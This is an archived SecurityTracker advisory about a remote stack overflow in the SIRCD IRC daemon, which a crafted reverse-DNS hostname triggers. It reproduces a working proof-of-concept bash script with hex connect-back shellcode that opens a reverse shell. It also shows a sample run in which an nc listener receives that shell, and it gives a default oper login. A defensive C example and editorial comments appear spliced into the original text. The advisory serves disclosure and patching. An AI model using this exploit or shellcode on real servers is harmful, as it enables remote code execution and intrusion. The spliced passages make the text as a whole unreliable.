SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Instant Messaging/IRC/Chat)  >  SIRCD
Vendors:  sircd.org
SIRCD IRC Daemon Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006155
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Feb 23 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes
Version(s):  0.4.6 and prior versions
Description:  A buffer overflow vulnerability was reported in the Smart IRC Daemon (SIRCD). A remote user can execute arbitrary code on the server.

It is reported that the software does not properly check the bounds of the hostname it receives from a reverse DNS lookup on a connecting client. The DNS server that answers that lookup can reportedly return a specially crafted response with the following layout, triggering a stack overflow and executing arbitrary code on the target server:

[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode]

A demonstration exploit script is provided in the Source Message.
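As an added illustration (not SIRCD's code; HOST_BUF, the function names and the hostname grammar check are assumptions), a bounded replacement for the unchecked copy of a reverse-DNS answer described above, with the layout length the advisory gives used as a constructed test input:

```c
/* Defensive model of the bug class described above: the reverse-DNS answer is
 * validated and copied with a bound instead of trusted. Added example, not
 * SIRCD's code; HOST_BUF and all function names are assumptions. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#define HOST_BUF 64      /* assumed size of the daemon's per-client hostname buffer */
#define MAX_DNS_NAME 253 /* longest presentation-form name RFC 1035 allows */
/* Accept only hostname syntax (alnum, '-', '.', labels of 1..63 chars);
 * a NOP sled, shellcode or embedded whitespace fails this check. */
static bool valid_hostname(const char *s) {
    size_t label = 0, total = strlen(s);
    if (total == 0 || total > MAX_DNS_NAME) return false;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++) {
        if (*p == '.') {
            if (label == 0) return false;          /* empty label, e.g. "a..b" */
            label = 0;
        } else if ((!isalnum(*p) && *p != '-') || ++label > 63) {
            return false;
        }
    }
    return label > 0;
}

/* Bounded replacement for strcpy(host, ptr_name): an answer that is not a
 * hostname or does not fit is dropped and the peer keeps its IP literal. */
bool store_peer_host(char *host, const char *ptr_name, const char *ip) {
    if (ptr_name && valid_hostname(ptr_name) && strlen(ptr_name) < HOST_BUF) {
        memcpy(host, ptr_name, strlen(ptr_name) + 1);
        return true;
    }
    snprintf(host, HOST_BUF, "%s", ip);            /* always NUL-terminated */
    return false;
}
/* Length of the layout the advisory gives: 94 filler + EBP + EIP + 400. */
size_t advisory_payload_len(void) { return 94 + 4 + 4 + 400; }

/* Would this PTR answer be stored as the client's hostname? */
bool accepts(const char *ptr_name) {
    char host[HOST_BUF];
    return store_peer_host(host, ptr_name, "192.0.2.1");
}
int main(void) {
    char crafted[512];                             /* constructed stand-in for the attack string */
    memset(crafted, 'B', advisory_payload_len());
    crafted[advisory_payload_len()] = '\0';
    printf("irc.example.org: %d  502-byte PTR: %d\n", accepts("irc.example.org"), accepts(crafted));
    return 0;
}
```

A real daemon would apply the same check to every resolver result it stores, not only to the reverse lookup the advisory names.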

Impact:  A remote user with control of a DNS server or the ability to spoof the DNS can cause arbitrary code to be executed on the target server.
Solution:  The vendor has released a fixed version, available via CVS:

http://cvs.quakenet.org/cgi-bin/cvsweb.cgi/?hidenonreadable=1&f=h&hidecvsroot=1&logsort=date&sortby=file&hideattic=1&cvsroot=sircd

A copy of the current CVS version (as of 4 Feb 2003) is available. It is reported to be the pre-release 0.5.0 tree:

http://www.sircd.org/files/sircd-cvs.tar.gz

Vendor URL:  www.sircd.org/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  <kain@ircop.dk>
Message History:   None.


Source Message Contents

Date:  Sun, 23 Feb 2003 20:56:32 +0100
From:  Knud Erik Højgaard <kain@ircop.dk>
Subject:  [Full-Disclosure] sircd proof-of-concept / advisory

Attached documents explain all.

This is also available from http://kokanins.homepage.dk

[Attachment: sircd.sh]

#!/usr/local/bin/bash
# /usr/ports/irc/sircd ; sircd v0.4.0; FreeBSD 4.7-RELEASE-p2
# shellcode=connect back to port 10000 shellcode (72 bytes) by bighawk
# lousy script by knud
echo -e "\nsircd 0.4.0 proof-of-concept, usage $0 <ip-of-attacker>\n"

# assign variables
attackerip=$1
filler=`perl -e 'print "B" x 94'`
returnaddress=`perl -e '$i=pack("l",0xbfafec04);print $i'`
egg=`perl -e 'print "\x90" x 328 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\x7f\x01\x01\x01\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"'`

# 94 bytes filler + saved EBP + EIP + 328 NOPs + 72 bytes shellcode = 502 bytes
attackstring=`echo "$filler$returnaddress$returnaddress$egg"`
# read -> 127.0.0.1 ^^^^^^^^^^^^^^^  (in the original the marks sit under the
# egg: the connect-back address and port 10000 (\x27\x10) are hard-coded in the
# shellcode, so $attackerip only controls the /etc/hosts entry written below)

# need uid=0 to modify /etc/hosts
if [ $UID -gt 0 ];
then
echo "UID = $UID, != 0, cannot continue";
else
echo "UID check passed, backing up /etc/hosts"
# if we end up here all is well
cp /etc/hosts /etc/hosts.$$
echo -e "$attackerip\t$attackstring\t$attackstring" > /etc/hosts
echo -e "Now connect to the sircd from $attackerip"
echo -e "Press a key and enter to restore /etc/hosts"
read restore
# quoted so an empty reply does not make test(1) fail (original used bare $restore)
if [ "$restore" = "" ];
then cp /etc/hosts.$$ /etc/hosts
else cp /etc/hosts.$$ /etc/hosts
echo "Game over man, game over"
fi
fi

[Attachment: sircd.txt]

I. BACKGROUND

According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code.
b: Default oper account matching *!*@*

III. ANALYSIS

a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.

The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode.

The accompanying .sh script is a silly proof of concept.
Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...

[shell 2]
# ./sircd.sh 127.0.0.1

sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>

UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
 

[shell 3]
$ sircd &
[1] 75711
 

=====================================
 sircd:  v0.4.0 Alpha
 Author(s)
   Zarjazz (zarjazz@barrysworld.com)
=====================================
sircd initialized
SSL initialized

$ BitchX 127.0.0.1
[snip some bitchx output]
[fi]  *** Welcome to the_server
[fi]  *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
 

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik Højgaard


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Copyright 2002, SecurityGlobal.net LLC